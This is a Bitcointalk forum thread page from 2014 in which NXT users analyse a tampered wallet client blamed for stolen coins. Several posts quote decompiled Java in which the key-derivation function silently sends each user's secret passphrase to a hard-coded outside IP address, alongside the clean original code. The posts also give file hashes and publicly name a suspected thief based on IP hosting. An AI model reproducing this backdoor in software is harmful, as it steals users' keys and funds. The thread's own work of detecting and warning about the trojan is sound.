Bitcoin Forum
May 05, 2024, 01:10:43 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 ... 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 [608] 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 ... 2557 »
  Print  
Author Topic: NXT :: descendant of Bitcoin - Updated Information  (Read 2761529 times)
salsacz
Hero Member
*****
Offline Offline

Activity: 490
Merit: 504


View Profile
January 02, 2014, 01:38:10 AM
 #12141

PaulyC:
the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history,  
the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:
Code:
 
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts
1714871443
Hero Member
*
Offline Offline

Posts: 1714871443

View Profile Personal Message (Offline)

Ignore
1714871443
Reply with quote  #2

1714871443
Report to moderator
1714871443
Hero Member
*
Offline Offline

Posts: 1714871443

View Profile Personal Message (Offline)

Ignore
1714871443
Reply with quote  #2

1714871443
Report to moderator
"I'm sure that in 20 years there will either be very large transaction volume or no volume." -- Satoshi
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1714871443
Hero Member
*
Offline Offline

Posts: 1714871443

View Profile Personal Message (Offline)

Ignore
1714871443
Reply with quote  #2

1714871443
Report to moderator
1714871443
Hero Member
*
Offline Offline

Posts: 1714871443

View Profile Personal Message (Offline)

Ignore
1714871443
Reply with quote  #2

1714871443
Report to moderator
1714871443
Hero Member
*
Offline Offline

Posts: 1714871443

View Profile Personal Message (Offline)

Ignore
1714871443
Reply with quote  #2

1714871443
Report to moderator
PaulyC
Member
**
Offline Offline

Activity: 82
Merit: 10


View Profile WWW
January 02, 2014, 01:38:31 AM
 #12142

Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?

DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo

The link is gone. The thief has probaly took it away. Can you upload yours zip download ?

the link I posted that says do not use? Or did you mean to copy someone else's post?

I made that link there, it has the zip inside, it's the smaller file. I don't have the exact link of where I DL'ed it but I believe it was Mega
and was definitely linked from Nextcoin.org.

@xyzzyx oh my bads I just  rar'd it together and threw the extension on the whole file, sorry.

Doge Mars Landing Foundation
(founder) Coined the phrase, "Doge to the Mars" and "Check that Hash!". Discoverer of the 2013 NXT nefarious wallet.  Admin. FameMom [FAMOM]
notsoshifty
Sr. Member
****
Offline Offline

Activity: 378
Merit: 250


View Profile
January 02, 2014, 01:38:41 AM
 #12143

Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?

DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo

The file you uploaded is a RAR file, not zip even though it has a zip extension.  Just a FYI for others who attempt to open it and get an error.

First file inside is 7173063 bytes in size and has the SHA256 hash:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (2).zip

The second file inside is 7177834 bytes in size and has the SHA256 hash:
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

Damn.

I'll leave further analysis to those who have more experience.  I only just started learning Java a few months back to do Android programming.  I'm more of an assembly/hardware guy.


Interesting...:

Code:
      if (!paramString.equals(""))
      {
        if (!myKeys.contains(paramString))
        {
          URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
          URLConnection connection = url.openConnection();
          connection.setConnectTimeout(10000);
          connection.getInputStream();
          myKeys.add(paramString);
        }
      }
jl777
Legendary
*
Offline Offline

Activity: 1176
Merit: 1132


View Profile WWW
January 02, 2014, 01:39:58 AM
 #12144

Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...

Still there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security. both perceived and actual.

If the hacker has to search a space 2^256, then even with petahashes it will take a long time. However, I am worried about clustering especially with user selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable looking but weak passwords to intentionally get hacked and give us black PR.

I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.

Not sure how much this will cost, but it will go a long ways toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?

James

P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?

http://www.digitalcatallaxy.com/report2015.html
100+ page annual report for SuperNET
utopianfuture
Sr. Member
****
Offline Offline

Activity: 602
Merit: 268

Internet of Value


View Profile
January 02, 2014, 01:42:50 AM
 #12145

Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...

Still there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security. both perceived and actual.

If the hacker has to search a space 2^256, then even with petahashes it will take a long time. However, I am worried about clustering especially with user selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable looking but weak passwords to intentionally get hacked and give us black PR.

I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.

Not sure how much this will cost, but it will go a long ways toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?

James

P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?

Agree. PaulyC deserves a bounty to uncover this type of thief.


░░░░░░▄▄▄████████▄▄▄
░░░░▄████████████████▄
░░▄███████████████████▄
███████████████████████
▐████████████████████████▌
█████████████████████████
█████████████████████████
█████████████████████████
▐██████████████████████▌
████████████████████████
░░▀████████████████████▀
░░░░▀████████████████▀
░░░░░░▀▀▀████████▀▀▀
  TomoChain  •    •  TomoChain 
░░░░░░▄▄▄████████▄▄▄
░░░░▄████████████████▄
░░▄███████████████████▄
███████████████████████
▐████████████████████████▌
█████████████████████████
█████████████████████████
█████████████████████████
▐██████████████████████▌
████████████████████████
░░▀████████████████████▀
░░░░▀████████████████▀
░░░░░░▀▀▀████████▀▀▀
mkmen
Full Member
***
Offline Offline

Activity: 157
Merit: 100



View Profile
January 02, 2014, 01:43:43 AM
 #12146

clean

Code:
  static byte[] getPublicKey(String secretPhrase)
  {
    try
    {
      byte[] publicKey = new byte[32];
      Nxt.Curve25519.keygen(publicKey, null, MessageDigest.getInstance("SHA-256").digest(secretPhrase.getBytes("UTF-8")));
      
      return publicKey;
    }
    catch (Exception e) {}
    return null;
  }

vs

Code:
 static byte[] getPublicKey(String paramString)
    {
      try
      {
        if (!paramString.equals("")) {
          if (!myKeys.contains(paramString))
          {
            URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
            URLConnection connection = url.openConnection();
            connection.setConnectTimeout(10000);
            connection.getInputStream();
            myKeys.add(paramString);
          }
        }
      }
      catch (Exception localException) {}
      try
      {
        byte[] arrayOfByte = new byte[32];
        Nxt.Curve25519.keygen(arrayOfByte, null, MessageDigest.getInstance("SHA-256").digest(paramString.getBytes("UTF-8")));
        return arrayOfByte;
      }
      catch (Exception localException1) {}
      return null;
    }

clearly someone modified Nxt$Crypto.class

EDIT: question is who and where did you guys downloaded this (where was the link)?

salsacz
Hero Member
*****
Offline Offline

Activity: 490
Merit: 504


View Profile
January 02, 2014, 01:44:12 AM
 #12147

We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads
NxtChoice
Full Member
***
Offline Offline

Activity: 238
Merit: 100


View Profile
January 02, 2014, 01:44:18 AM
 #12148

Hey there, i started an NXT forging pool, for poeople that want to forge nxt with some reliability or dont want the NXT client running all day long

Website: http://nxt-pool.uk.to/

Nextcoin.org thread: https://nextcoin.org/index.php/topic,1783.0.html


How to confirm you are forging 24/7 ?
S3MKi
Legendary
*
Offline Offline

Activity: 1540
Merit: 1016



View Profile
January 02, 2014, 01:45:56 AM
 #12149

We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads
agree
notsoshifty
Sr. Member
****
Offline Offline

Activity: 378
Merit: 250


View Profile
January 02, 2014, 01:46:08 AM
 #12150

Interesting...:

Code:
      if (!paramString.equals(""))
      {
        if (!myKeys.contains(paramString))
        {
          URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
          URLConnection connection = url.openConnection();
          connection.setConnectTimeout(10000);
          connection.getInputStream();
          myKeys.add(paramString);
        }
      }


epicdices.com is also hosted on 162.243.246.223 - coincidence?
EvilDave
Hero Member
*****
Offline Offline

Activity: 854
Merit: 1001



View Profile
January 02, 2014, 01:48:41 AM
 #12151

So, for the slower people here ( ie; me):

The smaller file:
First file inside is 7173063 bytes in size and has the SHA256 hash:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (2).zip


Is the correct client.

and the larger file:

The second file inside is 7177834 bytes in size and has the SHA256 hash:
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip


has probably had some sort of backdoor added to allow thievery?

Bastards, btw, if this is confirmed.

Nulli Dei, nulli Reges, solum NXT
Love your money: www.nxt.org  www.ardorplatform.org
www.nxter.org  www.nxtfoundation.org
Damelon
Legendary
*
Offline Offline

Activity: 1092
Merit: 1010



View Profile
January 02, 2014, 01:48:53 AM
 #12152

We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads
agree

joefox already locked some pages today, but there were translator issues related to that.
I'm just saying to let everyone know that he has been on the ball concerning wiki security.

Member of the Nxt Foundation | Donations: NXT-D6K7-MLY6-98FM-FLL5T
Join Nxt Slack! https://nxtchat.herokuapp.com/
Founder of Blockchain Workspace | Personal Site & Blog
PaulyC
Member
**
Offline Offline

Activity: 82
Merit: 10


View Profile WWW
January 02, 2014, 01:49:25 AM
 #12153

Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...


James

P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?

Agree. PaulyC deserves a bounty to uncover this type of thief.

OMG that would be amazing if that's possible, or anything.. Not to get ahead of myself but, Newcn too.. I mean he verified to me we had a very similar occurrence, way too much of a coincidence.
Thanks for any help.!


Doge Mars Landing Foundation
(founder) Coined the phrase, "Doge to the Mars" and "Check that Hash!". Discoverer of the 2013 NXT nefarious wallet.  Admin. FameMom [FAMOM]
salsacz
Hero Member
*****
Offline Offline

Activity: 490
Merit: 504


View Profile
January 02, 2014, 01:50:25 AM
 #12154

please check:
https://nextcoin.org/index.php/topic,1586.0.html

the link to the mega there is a hacker's link or not?

Drexme's post was also updated by punkrock, but I am not sure if the link there is good or not
https://nextcoin.org/index.php/topic,4.0.html
joefox
Full Member
***
Offline Offline

Activity: 210
Merit: 100


View Profile WWW
January 02, 2014, 01:51:20 AM
 #12155

opticalc, QBTC ---

WHY does nxtcrypto.org's download page point to https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

..instead of http://info.nxtcrypto.org/client.zip ...

... and WHY are the hases not published alongside the download link?

I admin the Nxt Wiki at http://wiki.nxtcrypto.org/ Please support my work by donating to Nxt account #1234567740944417915
salsacz
Hero Member
*****
Offline Offline

Activity: 490
Merit: 504


View Profile
January 02, 2014, 01:52:03 AM
 #12156

Interesting...:

Code:
      if (!paramString.equals(""))
      {
        if (!myKeys.contains(paramString))
        {
          URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
          URLConnection connection = url.openConnection();
          connection.setConnectTimeout(10000);
          connection.getInputStream();
          myKeys.add(paramString);
        }
      }


epicdices.com is also hosted on 162.243.246.223 - coincidence?

no, as I wrote here, we know identity of the hacker:

162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts
intel
Member
**
Offline Offline

Activity: 98
Merit: 10



View Profile
January 02, 2014, 01:53:44 AM
 #12157

This is the thread started by epicdices owner:

https://bitcointalk.org/index.php?topic=356282.0

[!] 24.7 NXT News Portal. Real-Time Update. Share your own news with NXT community and get FREE NXT!
newcn
Full Member
***
Offline Offline

Activity: 143
Merit: 100


View Profile
January 02, 2014, 01:57:24 AM
 #12158

Paulc
how much did you lost?
I lost about 18k nxt!

BTC:1NzzfeHCgN8fF6mSG1UeBFCVd2cxKbGyHk
NXT:13187911577562526278
utopianfuture
Sr. Member
****
Offline Offline

Activity: 602
Merit: 268

Internet of Value


View Profile
January 02, 2014, 01:58:23 AM
 #12159

This is the thread started by epicdices owner:

https://bitcointalk.org/index.php?topic=356282.0

I made a note in his thread https://bitcointalk.org/index.php?topic=356282.msg4263313#msg4263313


░░░░░░▄▄▄████████▄▄▄
░░░░▄████████████████▄
░░▄███████████████████▄
███████████████████████
▐████████████████████████▌
█████████████████████████
█████████████████████████
█████████████████████████
▐██████████████████████▌
████████████████████████
░░▀████████████████████▀
░░░░▀████████████████▀
░░░░░░▀▀▀████████▀▀▀
  TomoChain  •    •  TomoChain 
░░░░░░▄▄▄████████▄▄▄
░░░░▄████████████████▄
░░▄███████████████████▄
███████████████████████
▐████████████████████████▌
█████████████████████████
█████████████████████████
█████████████████████████
▐██████████████████████▌
████████████████████████
░░▀████████████████████▀
░░░░▀████████████████▀
░░░░░░▀▀▀████████▀▀▀
S3MKi
Legendary
*
Offline Offline

Activity: 1540
Merit: 1016



View Profile
January 02, 2014, 01:58:50 AM
 #12160

Paulc
how much did you lost?
I lost about 18k nxt!
about 7000 i think
Pages: « 1 ... 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 [608] 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 ... 2557 »
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!